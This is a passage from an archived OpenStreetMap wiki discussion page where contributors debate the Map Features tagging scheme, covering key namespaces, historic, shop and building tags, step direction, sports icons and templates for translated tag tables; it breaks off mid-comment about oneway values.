Jun 2006 (UTC) - The principle concerning tags seems to be "no compulsion, no prohibition". You are not forced to do anything, you cannot be stopped from doing anything. However despite this anarchic philosophy, good, consistent, comprehensive and useful schemes can be created and the Map Features is just such a thing. The class scheme is another one. IMHO the Map Features scheme is currently more comprehensive and consistent that the class scheme and so, for me at least, it is more useful. - It is true that having many competing schemes that are all attempting to describe the same thing could be counter-productive. On the other hand, separate schemes for specialised applications (like the UK cycle network or piste maps) can easily be accommodated and do not conflict. Evolution will hopefully ensure that the best of any competing schemes becomes the dominant scheme. - Some of the tags in the Map Features scheme are quite UK centric (eg Motorway vs Freeway vs Autobahn). Country specific variants of this scheme or even completely seperate schemes might evolve, or this scheme could be extended to allow Freeway as another highway type. Most of the renderer efforts are to a greater or lesser extent table driven and should be able to accommodate changes to the schemes as they grow and evolve. - Personally, I use the Map Features scheme and will stick with it unless/until something better comes along. 80n 09:21, 2 Jun 2006 (UTC) Linear non-highways? Any ideas for labelling things like hedge lines, field boundaries, power lines, fences? (talking about features in the deepest countryside here, not fences by the side of a road...) Ojw 14:21, 4 Jun 2006 (UTC) - For anyone who decides to devise some tags for hedges etc, please allow fields to be named. In my experience most farms in the UK have reasonably well recognised names for each field. 80n 21:16, 11 Jun 2006 (UTC) - Has anything come of this? I have gathered a lot of data about where the feild boundries are, and weather they are hedges, fences, open, or mixed borders. I'm not exactly shore how i should add them though, but i feal its important they should be added, as they are sometimes the only landmark for a person to reference. If I want a field to label 'rape seed' and then a hedge row around it to layble 'hedge' and then there is a track around it, and a road on the other side of the hedge... shoudl this then be 4 different ways? or is there a way to use the ways that make the field area also used for the hedge, and the road?.. Ben. 14:51 6th October 2006 (BST) Procedure for changing this document Looking at the history of this document, and how it relates to the real-world use, two things seem to stand out: - People have lots of ideas for new things they'd like to mark on the map - Most of these new tags won't show-up on the rendering software It would be nice to have a page at Proposed map features, where people can define a map feature they want to add, and then discuss or vote on the ideas in a structured way. For those of us writing renderers (80N's osmarender, my PDF atlas, and the openstreetmap.org team), it would be good to see what features people would like to tag, so that we can modify our software in a timely way to show those features and help the data-gatherers see what they're creating. Creating a new wiki page would at least give the impression that it's okay to propose new tags, and give a URL to send people who ask whether they can add a particular tag. Ojw 18:45, 11 Jun 2006 (UTC) - sounds a lot more scalable than having everything on this page, how about creating a category "proposed map features", that way we'll have every proposition in a single thread, so e.g. you can create a new page with the name map_feature_xy and add [ [category:proposed map features] ] at the bottom. if the feature isn't contradicted after a defined time (1month?) or is being appreciated, we could then add it to the map features wiki page, which would then be the official tag-table for renderer-builders - blk 19:22, 11 Jun 2006 (UTC) - I think this is a sound idea - to extend the coverage of tagging and also to have a mechanism that at least gets some feedback on the appropriateness of the proposed tags. We shouldn’t forget that a user is entitled to use whatever tag they wish for their own purposes, but here I think we are going beyond that by providing discussion that helps the majority fit the data input with available output options. Having said that I believe we have a first step to thrash out what a key should be. At the moment there is no restriction or convention on what a key is. Blackadder 10:40, 12 Jun 2006 (UTC) Gate in highway/nodes I would like to know what is meant by "gate" in highway/nodes. Could it be a synonym for barrier ? Thanks. FredB 20:08, 26 Jun 2006 (UTC) - In the UK we have gated roads, mainly associated with a cattle grid that stops livestock that roams freely on open land from getting into areas where livestock is fenced in. You can also of course find gates on many footpaths. Barrier is an alternative but suggests you might not be able to pass, whereas a gate implys you might be able to open it to continue passage. Blackadder 09:38, 3 Jul 2006 (UTC). Historic Many items are of historic interest. However, you would not necessarily describe something as primarily historic. It is more important to describe what it actually is, rather than describing it as historic. For example, A castle isn't a historic. A castle is a building which perhaps has a property of being of historic interest. A monument may be a building with or without having a property of historic interest. I therefore propose that the historic tag should no longer describe what it is, but instead describe what type of history may be attached to it. I propose: historic=monument and historic=castle should become building=monument and building=castle . All other currently defined historic tags marked deprecated. The historic tag should then be re-purposed for the type of history it relates. For example, castles would be history=kings_queens battles would be history=war old churches marked history=eclesiastical, old machinery history=industrial, fossils and excavation sites history=natural. I will produce a table with re-purposed history tags. - There's many other historical things we need to consider: Stone circles, earthworks (linear) like Offa's Dyke, forts (without any ruins or buildings remaining,) barrow, burial chambers etc. Anyone any ideas how we could tag these things? --Gwall 12:07, 5 September 2006 (BST) Tracks Currently, so i understand, there is just 'tracks' for anything smaller than a minor road?...This means round me everything is Minor, or Track. This seems very vage. Also Rather than just sticking a tag for a gate on the road, cant the entire road be marked as a gated road, as that is what they are called, and sign posted as. Would having Minor - Gated - Drive - Lane - Track, be better, as this would cover all the types. It's just theres a huge difference between a farm driveway with tarmack or cement, a Lane with Gravel or stones and usually some sort of hedging around them, and tracks that are nothing more than compacted earth that run along field edges. Ben 21:17, 13 September 2006 (BST) Also...Resedential Roads: I'm not really shore what the difference between minor and residential is, cause the roads are the same. I asume it automatically gereates the graphics for houses? when rendered later. If so, how do i just stick a buildings on one side of the road?. Or do i need to draw a box and applie a tag to that to make it a building? Ben 21:26, 13 September 2006 (BST) Embankments/Valley When trainlines/roads/dismantled railways etc cut threw the land, the ground either side rises or dips sharply. Is there any way these banks can be represented currently? Ben 21:23, 13 September 2006 (BST) User Defined Tags User defined would IMHO be best implemented using a namespace scheme, otherwise the core scheme become impossible to extend. If I elect to use <tag k="waterway" v="pool"/> to represent artificial basins then this makes it hard to implement a core tag that means a small pond. OTOH if I used <tag k="waterway" v="ec:pool"/> then there is no possibility of conflict. Likewise user defined tags should be namespaced so <tag k="opm:liftType" v="chair"/> would avoid future conflict should we want a core tag called liftType. - Agreed, it would be a good idea to have all User Defined tags in a different format to core tags although I'm not sure the intention was ever to be that restrictive on the format. As far as I'm concerned, anything goes provided the syntax does not break something (down to the editing software to ensure that). You just have to remember that if you want other users to know what you meant you need to follow something they can understand, eg a core set. Blackadder 11:09, 17 Mar 2006 (UTC) - I propose that we add a strong bit of advice to recommend that user defined values are prefixed with a namespace if the user wants to guarantee that they won't conflict with, or worse, be misinterpreted by some future usage. 80n 13:40, 17 Mar 2006 (UTC) - Why not just say that "everything may conflict, everything may be changed in the future?". Would be more honest. I don't see why anything should be engraved in stone. Coders should not be lured to think that they may depend on any value to be there. - I just have finished a converter of OSM xml format to other formats and I BOLDLY suggest to restrict the allowed characters of tags (= key-names) to the following set: 'aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ_' in order to retain reusability. After having looked at about 100 MB of data we found characters like space, slashes, colons and even more weird ones. And I don't think this will take too much of users freedom of choice... --Geonick 00:26, 12 February 2008 (UTC) Proposal for strong namespaces There has been a lot of talk both on the mailing list and IRC about how to internationalise the names used for tagging. Here's my suggestion: The problem - Anyone should be able to use whatever tags they want. This makes it impossible to enforce any standards, which makes it hard to render or use the data in many automated ways. - The "Map Features" tags are UK optimised. This makes it harder for other countries to work out how to tag roads. It may also have other side effects - for example some countries have speed restrictions on their equivalents to motorways. A solution I propose that we introduce a namespace to both the keys and values, for example: <segment> <tag k="core:highway" v="GB:motorway"/> </segment> This would define the key-value pair to be a member of the "core" namespace. This namespace should be reserved for pre-agreed key/value pairs. The value defines the "highway" to be a "motorway" in the GB - I use GB rather than UK so as to follow the ISO convention. This way key vale pairs can be defined for each country, so that they make sense in each country and are in-keeping with the local laws, for example: <segment> <tag k="core:highway" v="DE:autobahn"/> </segment> This would be an autobahn in Germany. I have elected to fix the key value - this, guess could be changed, though I feel that it might add very little to the scheme. This can be dealt with in the GUI if deemed appropriate - OK, I'm beginning to think that it should be k="core1:highway" rather than k="core:highway" to allow for further extensions beyond "core v.1" Mwelchuk Mwelchuk 22:51, 08 August 2006 (UTC) - I kinda like the idea of having country specific tags. However I think a better system would be to define where each country is (possibly with the help of the is_in tags and using the same method that freethepostcode uses). We then use that hierarchical information to determine the country (a street belongs to a city, which belongs to a region, which belongs to the country, which belongs to a continent). This method would probably take more work, though it wouldn't require a change to the tags to include the country name in the value. Renderers would need to be updated to cover their specific country names such as autobahn, and to be able to cope with the country specific defaults. However it would be simpler for data entry. Another example would be max_speed. This can be mph or km/h depending the country that you are in. Smsm1 01:17, 9 July 2007 (BST) Confusing Table Now I know why I was confused at first. The first row in each section of the table implies that the key should be type and the value should be, for example, highway: Would it be better like this? 80n 17:50, 17 Mar 2006 (UTC) - Yep. It started out as a spreadsheet which I was simply replicating down as I went. Your revision looks clearer. Blackadder 18:04, 17 Mar 2006 (UTC) - This is even cleaner to me. I don't know why list the "Physical" at all. Can it be entered somewhere? Does it matter? And please, remove the "User Defined" - stuff. EVERYTHING can be User Defined. --Imi 15:35, 24 Mar 2006 (UTC) - When starting off I split the keys into logical groups to help reduce duplication. As you say, these groupings have no import into the actual use of the keys and values and you won't therefore find them mentioned on the individual keys and values pages. I plan on cleaning these out sometime in the future. Blackadder 16:24, 24 Mar 2006 (UTC) - I agree this looks much better than the table right now. Can I start doing this on the main page? --bartv 09:29, 21 October 2006 - I just did this for the first part. If there is no outrage I plan to do the rest next weekend or something--Bartv 11:26, 18 November 2006 (UTC) - Outrage! :) I find this change harder to read, and makes a scroll needed to see the key name (Yes, I have poor memory…) - Oh, and with the default link colour, it's harder to read the key:value link with it being dark blue on wine red. - Suggestion: use fewer table columns (doable, remove feature, feature type from table), maybe shrink images, or create a two values/entries per row table -- Johndrinkwater 15:58, 22 November 2006 (UTC) I have prepared 4 small symbol instead of text (node, segment, way, area) in Element column. see example bellow --Dido 08:03, 17 June 2007 (BST) - node, - segment, - way, - area Power - It is a good idea. Small changes I propose: the angles and lengths of lines should be in every symbol the same, use a border, node a little bit bigger (here with red midpoint approximated to JOSM). And pastel colors. - I like this idea too, especially the changes from OnTour. Makes the thinks a lot easier for newcomers. --Etric Celine 20:48, 17 June 2007 (BST) yes/no or true/false Should we be using yes and no as we generally are now or swop to more generally recognised boolean true/false Blackadder 09:19, 24 Mar 2006 (UTC) - Hmmm if we were going for "more generally recognised", I'd say "yes/no" is probably more widely used and recognised than "true/false" (among the english speaking non-geek population at least)... but then "true/false" seems more precise and unambiguous. Either way seems fine. We should probably choose one or the other, for the sake of making the data easier to use. -- Harry Wood 14:42, 28 August 2007 (BST) Why highway? why do you use "highway" as tag name? "highway=footway" is a very strange syntax.. Erik Johansson 08:38, 3 Jul 2006 (UTC) - I grouped different types of ways, hence highway, waterway, railway etc. So if you can think of a better container for roads, footpaths, bridleways, cyclepaths and other street type features then you could use that as an alternative. Of course if you don't want to group you can simply use footpath=yes of something similar. Blackadder 09:34, 3 Jul 2006 (UTC) right-of-way is the usual convention for these things, as that is what is being defined, the right to use it as a way of travel Myfanwy 15:08, 4 October 2007 (BST) Buildings I suggest a generic set of tags irrespective of the use of the building: building=warehouse building=tower building=block (eg office block or block of flats) building=terrace building=detached building=semi with additional tags such as height=<height_in_meters> floors=<number_of_floors_above_ground> use=<public|commercial|residential> with amenities provided (eg medical care/surgery/hospital/library/supermarket/town hall/restaurant) specified either in nodes or as tags to the building area. - I agree and suggest adding 2 properties for house-number and the street it belongs to enable door-to-door navigation. Houses spanning multiple house-numbers/streets are broken up into individual ones. Would the id of the Street(easy to parse) or the exact name(would need to be exactly as written in the street and be changed if the name of the street changes) be better as a value? With current tools the name is far easier to do. --MarcusWolschon 16:46, 14 August 2007 (BST) Tourism Everything in the tourism section is more fittingly an amenity. I propose moving all those to the amenity tag and creating a new tag, interest, to include the following: tourist, motorist. I'm open to suggestions for other things it could include. -- Hawke 02:51, 25 January 2007 (UTC) Markets I need the ability to tag (street) markets. OK with amenity=market? Pemberton Just the thing I was looking for, so I'm in agreement with you Papaspoof Alternate system Hello, I'm possibly over-keen for some programming to do, but would it be useful to have the key,possible values,comments stored in a database and then shown on here. (log in with username test, password test). Click on the 'e' by any event and you can see how it can be edited. (Please don't click x or d). This code has a history of all changes, and changes are revertable just like in the wiki system. --Rickm 23:23, 24 September 2006 (BST) Oh, the other reason I thought of it was that it would mean showing different languages & translating them might be easier --Rickm 23:28, 24 September 2006 (BST) Default values See the discussion on default values I started on the mailing list. Archive. Basically all tags have a default and we should explicitly mention what it is for each tag. --bartv 09:29, 21 October 2005 (CET) Fall trough from ways to segments Some (most) of the linear tag/value pairs make sense for both ways and segments. I think we should think about how they work together. For example what if the "oneway" tag of a street is set to "no" expect. None of the segments that make up this particular way have "oneway" tag set except for one segment where it is set as "yes". Most logical seems to me have the tag on the segment take priority. Thus in the earlier example the whole street is open for two-way traffic except for the section described by the segment that also carries an overriding "oneway" tag. This issue touches my previous "default values" remark. What if the street has no "oneway" tag, but some of the segments do? --Bartv 14:40, 23 October 2006 (BST) Duplicates I've noticed we have amenity=grave_yard as well as landuse=cemetery - which should be used? Jon 12:34, 24 November 2006 (UTC) - I've been using both based what I consider to be common usage: a 'grave_yard' is that area surrounding a church (or other place of regular worship) used for burials, whilst a 'cemetery' is a piece of land used for no other purpose than burials or cremations. -- Batchoy 14:02, 24 November 2006 (UTC) - When I set up the original Map Features we did not have area support in the db and thefore it did not cover tags for areas really at all. Thus the amenity=grave_yard would really be intended as a label for a node. Where you find this type of inconsistency or duplication its best if you can apply both tags (if you think they both apply) until a better tagging framework gets completed and we can weed out unnessary duplication. Blackadder 14:20, 24 November 2006 (UTC) Why not get rid of the underscores? Underscores are used in programming languages such as C because a variable must be made of a single word. Here, in OSM, tags are just key-value pairs and there is no reason to bother with underscores. I think multiple-word keys and values should be allowed. Keys and values are represented as strings in the XML file anyway, so it probably doesn't make any difference to the software developers. For example, instead of <tag k="railway" v="light_rail"/> why not just say <tag k="railway" v="light rail"/> without the underscore?. Novem 23:18, 26 November 2006 (UTC) tagging historic town gates a) in Germany we have many history town gates at the borders on the old city walls. They should deserve a own specific tag. My tagging proposal is: key: "historic" value: "Town gate" b) How to tag the railway station building. It is no node on the railway tracks, however an area or a node beside the railway track. Proposal: key: "amenity" value: "railway station building" c) How to mark a Museum for non-historic items? E.g. a museum for modern arts or playing toys? Is there still the key "historic" appropriate? key "historic" value: "museum" Pease comment. Archive 2007 Photo key perhaps the wrong wiki? use waterway=stream for the 'ditch'. Osm@floris.nu 13:53, 24 June 2007 (BST) I am adding photos as and when I find them and have spare time. If anyone has better/different pictures that they think better explains the feature feel free to replace mine. pray4mojo 20:28, 8 July 2007 (BST) What about chapels and small temples etc. Shouldn't it be distinguished between (big) churches etc. and chapels or small temples as they exist in many places? At the moment there is only "place_of_worship" option and "denomination". I agree, but also, when walking, the distinction between a church with a tower, church with a steeple etc is also very useful to confirm your location. --Hadleyac 01:57, 8 June 2007 (BST) Could someone please add comments to every tag shown on the list, even obvious ones? example: whats the difference between hotel, motel, guest house, hostel? what's a water_park? what's an icon? --Gerchla 23:09, 12 January 2007 (UTC) I have added Links to Wikipedia for hotel, motel, guest house and hostel. Waterway-->Stream Hello, I've seen Waterway, Stream used by some people - is this an official tag? if so shall I add it to the list? Ta C2r 08:01, 20 February 2007 (UTC) Housing Estates How should I tag housing estates? I have rather a lot of them locally and I'd like to do them consistantly. I've made each tower block a node but I'm wondering whether they'd be better off as areas so that their shape can be rendered. Maybe this would enable estate maps to be produced? What should I be tagging them as? Thanks. Secretlondon 00:20, 15 March 2007 (UTC) - I've started making large tower blocks areas and tagging as landuse=residential and is_in=Aylesbury Estate. I think it probably needs more than this to identify high rises, maybe number of floors? I'd love to know how other people are making area/town centre/estate maps Secretlondon 06:11, 16 March 2007 (UTC) In supplement to Confusing Table The tables are confusing furthermore. We have some different variants. I propose to modify every table as follows. The columns "Feature" and "Feature Type" should be removed in every table, not only in the table of "Highway". The columns should have the same width, if possible. The colors should be more friendly. Besides, the phrase "one of the following" is confusing and should be replaced. I ask for comments: Waterway For the "segment" and "way" elements only one key "waterway" is allowed with one of the following values. For the "node" element only one key "waterway" is allowed with one of the following values. OnTour 19:33, 29 May 2007 (UTC) - OnTour 21:40, 12 June 2007 (BST) - Looks nice, but theres now differences between it and the current page!...match them then switch. I don't think the rendering column is needed. It's up to whoever makes the rendering program how they render it, this page is talking about tags. I suggest removing that column therefore. Ben 00:44, 13 June 2007 (BST) Landuse Farm Does this area include ordinary farmland (agriculture, e.g. wheat fields), or only horticultural areas? I was wondering because the description is a little bit ambiguous. Longbow4u 07:48, 13 June 2007 (BST) - Thx, :-) Longbow4u 15:01, 13 June 2007 (BST) - I think the opposite to Spaetz.=pasture" and "landuse=cropland" --Cbm 05:19, 30 December 2007 (UTC) Example: Why photos? This page Map Features should give a overview of the possible features. I think photos are not very helpful in reality. Besides, this page will be bigger and bigger. The column photos should be deleted. Only in difficult cases an additional Example should be used.--OnTour 21:45, 8 July 2007 (BST) - I was only adding photo's to the page as I had seen some on there already and read a little on the mailing list. The biggest help as far as I can see is for people who want to clarify what each type of feature each tag is for. Maybe to see where a secondary road becomes a tertiary or, for people who want to know what a feature is in there own language (supposing it has not already been translated). pray4mojo 23:16, 8 July 2007 (BST) - It's right, photos are very helpful for a clear understanding. It should be used for this, however, only the column "Example". This should be applied reasonably. So, pictures or graphics should use only where an appropriate requirement consists. If necessary, not helpful render graphics can be removed. OnTour 22:14, 10 July 2007 (BST) - It could be usefull to have the related Key page (e.g. Key:highway) explayining in depth the different option with a small gallery of real matching cases --EdoM (Parliamone) 08:31, 13 July 2007 (BST) moving amenity=supermarket to shop=supermarket I moved supermarket back into amenity key. IMO changing things already in map features should be avoided if at all possible. It creates a lot of work. - Someone has to modify all the programs that use OSM data to understand the new key. - Someone has to tell users to use the new tag instead of the old one. - Someone has to go through the OSM data and change all the old tags. - Someone has to repeat the previous step at regular intervals well into the foreseeable future to catch new additions of the old tag. Remember there are a lot of users that don't subscribe to the mailing lists. I suspect there are also lots of users rarely return to Map Features after they have memorized the core set of tags they use. These users will continue using the old tags without realizing the tag has changed. If this has been discussed somewhere I have missed, please revert my changes. --Thewinch 21:31, 11 July 2007 (BST) Moving supermarket from amenity to shop was approved in the process of adding the shop key - and was recently discussed on the mailing list by me to be sure. Maybe editing on this page without any discussion on the list should be avoided? A simple note on the mailing list by you would have been nice. Basically, you're saying that once a feature is in this page, it never can be changed to anything else - which is a complete stand still. Newbies often do complain that the tagging scheme is strange and not documented at all. So keeping the current state is probably not such a good idea as it seems and waiting until doomsday so that things you describe changes won't make things better, as new user become familiar with bad concepts and new data is added the wrong way. What is all the programs to understand the new key you mean? mapnik, osmarender, mappaint and potlatch - that's it for my part. I've already changed mappaint accordingly and Tweety might change osmarender and mapnik soon. Yes, users will have to learn some new tags, some more changes are gonna come in the tagging scheme, not only from me. BTW: changing this page only says that you shouldn't add anything new with these tags, the old tags may still be there - the renderers will understand both, at least for a while. Ulfl 04:46, 13 July 2007 (BST) Removing approved map features - amenity = townhall Someone deleted amenity=townhall. It was a proposed feature. Why all this voting overhead if everyone is free to change the map features as he/she like! I changed it back. Start an disapprove process if you like to remove something, but not simply do it! --audifahrer 10:05, 12 July 2007 (BST) Tag 'cheatsheet' I've produced a cheat sheet of the tags I tend to use, in a way that makes most sense to me. Wondered if anyone else thinks this approach is useful too? Frankie Roberto 23:56, 30 July 2007 (BST) Areas Many of the points of interest, such as almost all of the amenity tags (excluding some of the really small ones like phone box and post box), and the shop, tourism, and historic tags, should allow either a node or an area to be defined. Now that we have Yahoo satellite imagery, it is often possible to trace the area of buildings. A few, like aeroway=terminal, actually are rendered by Mapnik and/or Osmarender (see Heathrow Airport). Andrewpmk 22:59, 25 August 2007 (BST) Wather-Bus Stop Were i find, or how is the code from a watherbus or public-boot stop?--Bobo11 21:29, 17 November 2007 (UTC) What is a derelict_canal ? As of latest Potlatch 0.6 there is a derelict_canal not yet explained in the wiki - what's that? --katpatuka 08:00, 27 December 2007 (UTC) - An old, closed (out off order) canal, or an fragment of a hystoric canal. --Bobo11 00:24, 28 December 2007 (UTC) Mixed Use? Quick question: Are there any plans to include a "Mixed Use" variant of land use, as there are already residential, commercial, industrial, etc. already included? "Mixed use" being an area specifically zoned for a mix of residential/commercial/light industrial or similar. On many zoning maps, I've seen a mixed use area shaded as brown. --Bridger987 14:51, 28 December 2007 (UTC) Edit: Another, more obscure zone that I discovered is included in the town that I live in is "Office/Industrial," which, I assume, is a mix of low-density commercial and industrial. --Bridger987 15:10, 28 December 2007 (UTC) Most Shops / Many Other Items Never Get Rendered? Most shops (and many other tags) have no icon in the render column. It seems that these only appear in the editor, but don't show on Mapnik / Osmarender at all (not even a generic dot, like in the editor or text name). This means that the vast majority of shops and many other objects that get put in the map data, never appear on the maps. For example, I just mapped all of the shops in one town, however most of them don't show anything at all - not even a dot - where 95% of these shops have been entered. Even using the tags here. Could we get some small, inobtrusive, generic icon used (like just a small square) so people can at least hover the cursor over it and see the name and shop type? Heck, if it's a case of needing an icon, I'm happy to design one myself. It's just very discouraging to gather so much quality data, and have it be invisible, presumably just because it lacks an icon. RoadLessTravelled - Indeed, there should be at least some generic icon. I think the hover thing is a little bit more complicated (and might only be accomplished using open layers), but should be implemented in the near future, too. Shops are one of the most important, most mapped POIs I guess. --Scai 08:59, 8 August 2010 (BST) Linear fords Hello, we've got a node highway tag for a ford, but what to do in cases where the ford is so long it should be a segment? examples include - Furneaux Pelham TL438283 to TL437294 Standon (TL393221) Much Hadham - TL430187 to TL432186 C2r 19:57, 21 February 2007 (UTC) The two examples of 'shop' – butchers and bakers – seem poorly chosen and no guide to how to tag up other kinds of shop. For a start, they use a vernacular phrase that is actually a possessive. Fetch me sausages from the butcher's, with the apostrophe, is the correct form, being short for butcher's shop. Regarding the bakers, the same criticism applies, as well as the fact that not all bread shops bake their own bread, so not all are really baker's shops. I propose we use a new form that declares what are the main goods that may be bought in this shop, so we'd have: - shop=bread - shop=meat - shop=tools|kitchenware The older form would be ok too, and butcher and baker should be acceptable, I think, as well as newsagent, off_licence, etc. I still long for a way of setting multiple values for one key. Shops are in great need of this – I sneaked in an example on the 3rd item above. A well-maintained region would enable shopping routes to be produced, given a shopping list, perhaps by a hypothetical local shop support group or anti-supermarket project. — Lorp 22:12, 22 February 2007 (UTC) - How would this scale to a town centre? We clearly need a supermarket tag, street market, off license (alcohol shop), internet cafe, food(in general), fishmongers, pound shop? ethnic food shops (if so which ethnicities..) etc Secretlondon 17:41, 11 March 2007 (UTC) How about options for tagging "Farm shop" - a shop selling local produce normally able to tell you exactly where and how everything is grown or reared. And also "Farmer's market" a weekly or monthly market where storeholders sell locally grown, reared or manufactured goods. Useful for those with a eco consciense or for those wishing to support local trade and agriculture. --Farrpau 10:30, 4 May 2009 (UTC) highway/steps Should we standardise this to point downwards (or upwards)? Morwen 16:55, 21 March 2007 (UTC) - I say standardise upwards. Steps are comonly seen as a thing to take you up a level so up makes more sense to me. Milliams 16:19, 22 August 2007 (BST) - If the ways at the ends of the steps are on different levels then isn't that enough? --Korea 20:03, 24 August 2007 (BST) - I take steps up a level and down a level in almost exactly equal proportion. I think having the ends of the steps at different levels would work better, in practice, because for most ways the direction is irrelevant, and so it's easy to just ignore the direction of your ways. Looking at the map, there's no way to tell whether the arrow indicates conformance with a standard or simply the direction that the original mapper took when mapping. Having the ends of the steps in different layers is much more intentional, and therefore meaningful. --Eulochon 20:19, 1 May 2009 (UTC) - All stairs I've seen in technical drawings/blueprints has a arrow in upward direction. I vote to follow this standard practice in OSM as well. To use the layer of the connecting ways (or start and end node) is a bad idea as these might be changed without considering the adjacent stair. Gorm 00:18, 15 June 2009 (UTC) Sailing Club / Rowing Club Around here we have lots of sailing and rowing clubs. They do not fit with leisure/marina or leisure/slipway because not all have marinas, and they are generally private anyhow. So I would suggest two new values under leisure; leisure/sailing_club leisure/rowing_club I have dotted a few around Poole Harbour This could be a problem for primarily motor boat clubs, eg Royal Motor Yacht Club in Poole harbour, but if you went for Yacht club rather than Sailing, it would not suit dinghy sailing. An alternative would be to put them under sport, and for example the Weymouth Sailing Academy would fit this, but I prefer the leisure one. --Hadleyac 01:54, 8 June 2007 (BST) Tourist routes In Poland, and I suppose that in other countries too, there are defined routes for hiking and cyclinge marked with colours. Coulour makrs are painted on the trees along the route. The thing is that a route may, and most often does, comprise several phisical ways. For example you walk along a unpaved track (tracktype=grade2) for a mile and then you turn into a footpath in a forest. And both ways carry the same mark, e.g. red. There are two categories of such routes: footrouts and cycleroutes. Footroute may contain any way (except of motorways and other noisy types), it may be in rocky mountains, sometimes they may even be impassable (in the spring or after heavy rain) while cycleroutes are defined generally along rather compact roads. So what we need is to define and mark with colours routes going along phisical ways and mark it as footroute or cycleroute. - See De:Germany_roads_tagging#Wanderwege_und_Radfernwege (sorry in German, but contains useful links to pages in English). Btw: Yay to the ingenious tourist way tagging system used in several mid- and eastern european countries. Unfortunately, in German it was overcome by glyph babylon. Ipofanes 10:44, 19 September 2008 (UTC) Building = yes Shouldn't building = yes be added to this page? It is widely used, and both Mapnik and Osmarender render it. Andrewpmk 22:59, 25 August 2007 (BST) Yes it definitely should. I moved it to man_made, working around the memory-issues when loading this page. --fuesika 22:44, 9 March 2008 (UTC) Sports Icons here are my concepts of the sports icons: they ar inspirated by the symbols of Olympia 1972 - Football - Swimming - Tennis replace .png with .svg to see the svg-files. I think it would be nice if every sport icon has the same layout. so you know that it is a sport icon. --Josias 09:47, 17 December 2007 (UTC) - In the Wikimedia-Commons an user has build PD-symbols for the olympic sports, this symbols could be used without copyright restrictions. (I would build SVGs from this symbols.) --Hedavid 11:49, 29 December 2007 (UTC) There appear to be SVG versions in the Commons now: f'r'instance this one for rugby... could they not all be adopted? -- TomJ 2101, 13 Feb 2008 Sport What about martial arts? Is there/should be a category for those? For example Karate, Taekwondo, Judo and others. How about VORTAC (VOR, DME, NDB) Should a VORTAC maked as man-made = beacon? I would prefer the official Symbol (a hexagon with three black rectangles on threesides)? --Arbol01 16:32, 30 December 2007 (UTC) Internationalization of the map features page The map features page is already translated in different languages (e.g. Fr:Map_Features, De:Map_Features, Cz:Map_Features, etc...) and it's increasing. I think it would be really helpful for the translators if we could use a template to keep the page up-to-date, sharing the same list of approved tags. Of course, it's not the idea to have the whole page as a template but just one template per table (e.g. a template for highway). I made a small page testing the concept here. The template is here. With this template, the english Map Feature section for highways would just need this: {{Map_Features:highway}} My proposal is that the template provides the text in english by default. Thus, the effort for the original writers is not so important, the english text is writen only once and if local countries do not translate immediately, the english text appears by default. Note that I already submitted this on the talk mailing list but nobody answered. Is this idea so "incongruous" ? Please put your comments. -- Pieren 23:00, 4 January 2008 (UTC) - A shit, seems like I must have read over your mail. We both had the same idea with this approach. - I think it's a good idea to use a template for the tags on the Map Feature pages. At the moment it's a big hussle to keep all the translated pages synchronized. - My solution for this "problem" can be found here Template:Aerialway Values Overview and an example here Key:aerialway. - I should read the discussion pages more often, to avoid doing things twice --Etric Celine 13:52, 7 January 2008 (UTC) - Hmmmm - So there's a second problem to try to solve. Duplicated definitions appearing on Key pagess, and on the main Map Features page. This could also be solved with a template structure, so it's worth thinking about at the same time as the internationisation issue. And Etric Celine's template tackles this. but... - Template:Aerialway Values Overview has a major problem, in that editing the text of the tag definitions, becomes quite tricky. It's hidden away in a template, and intermingled with the text written into other languages. - Another thought is... You could take it down a level further. Individual 'Tag' pages (such as Tag:natural=coastline) could contain the short text description of what that tag means, and that text could be transcluded into the Key:natural page and finally on to Map Features. On the one hand that's quite elegant. On the other hand it means you have to go even deeper to find where you can actually edit the text. - Meanwhile Template:Map Features:highway (Pieren's idea) keeps the text content all still editable on the Map Features page. Nice and simple. But... it only tackles the internationalisation problem. There is still the problem that the 'Key:Highway' page is going to have a duplication of a whole section of the Map Features page. - Hmmmm. Template structures make my head hurt. It's possible some bespoke developed solution will solve this better, so that this ceases to be a wiki organisational problem, and the duplication/internationalisation problems to go away. Something like Tagwatch perhaps, but the trouble is we need features for democratically deciding on tags (and descriptions of tag), which is... what the wiki does best. - -- Harry Wood 16:34, 7 January 2008 (UTC) - you say ">There is still the problem that the 'Key:Highway' page is going to have a duplication of a whole section of the Map Features page.". But this can be easily fixed by my proposal : just call the template Template:Map Features:highway twice (at least in english, it's only one line), once in the "Map Features" page with the default short description, once in the "Key:Highway" page with additional sections for more comments, examples, combinations with other keys, etc . -Pieren 11:35, 8 January 2008 (UTC) - I think he means that you need to copy the translated descriptions which are not shown by default. Anyway I don't believe all the Key:something pages will be translated in the "near future" so this shouldn't be a problem. At least we have the Map Features pages sorted and the same structure on the Key pages even if they are just in english. - The only thing I like to change in your template is the missing link to the corresponding tag page (Tag:highway=motorway for example), then I'm fine with it and think we should use it. - The Tagwatch solution is something that does not work out really. The problem here is, that the script can only show descriptions which are parsed from the related Wiki page. At the moment this means again copy&past and try to synchronize. I've started a small approach to parse every existing [[Tag:Key=Value]] page to get this information, but this is still not perfect. - The best thing is to draw a huge line between "democratically approved" tags and a list of every tag which is in use. In general everyone is allowed to enter any tag he likes and as long as he writes a documentation about it, we can show it either with Tagwatch or any other approach. The Map Features should then list just the "approved" tags. --Etric Celine 13:00, 8 January 2008 (UTC) JOSM presets don't seem to agree with the table here, need to get the food and drink thing more consistent I'm adding ammenities (or are they something else?) in Paris, and have realized that we we have a couple of problems with food and drink tags. - The JOSM presets don't quite line up with the recommended tags here - I'm finding the sub tags either too expressive, or not quite expressive enough. For example, I'm trying to add "Bar Hemingway" at the Ritz, and the choices I find are "nightclub", "café", "biergarten", and "pub". Well the Hemingway doesn't really fit any of those (I guess pub comes the closest". So I'm calling it a "bar". I hope that's OK. What we finally decided to do with this stuff for Wikitravel was to just put lump them all, including coffee and tea joints under "drink". I don't know if that's appropriate here, but I do think that if we're going to be really expressive about the tags then we also need to have a longer list of choices to try to fit things into. Does that make sense to anybody? Thanks! -- Mark 16:46, 13 February 2008 (UTC) - I think we at least need to distinguish between coffeeshops/tearooms, and bars. Often people will be looking for one, and the other won't do at all! - Notmyopinion 12:38, 18 August 2008 (UTC) oneway The following tags are ambiguous and thus should be deprecated: - oneway=no or - oneway=false Some people might think that cars may drive on these streets in both directions, while other people might consider these streets a oneway street, where driving is only allowed against direction of the arrow vector. - So what should you name streets that you know aren't 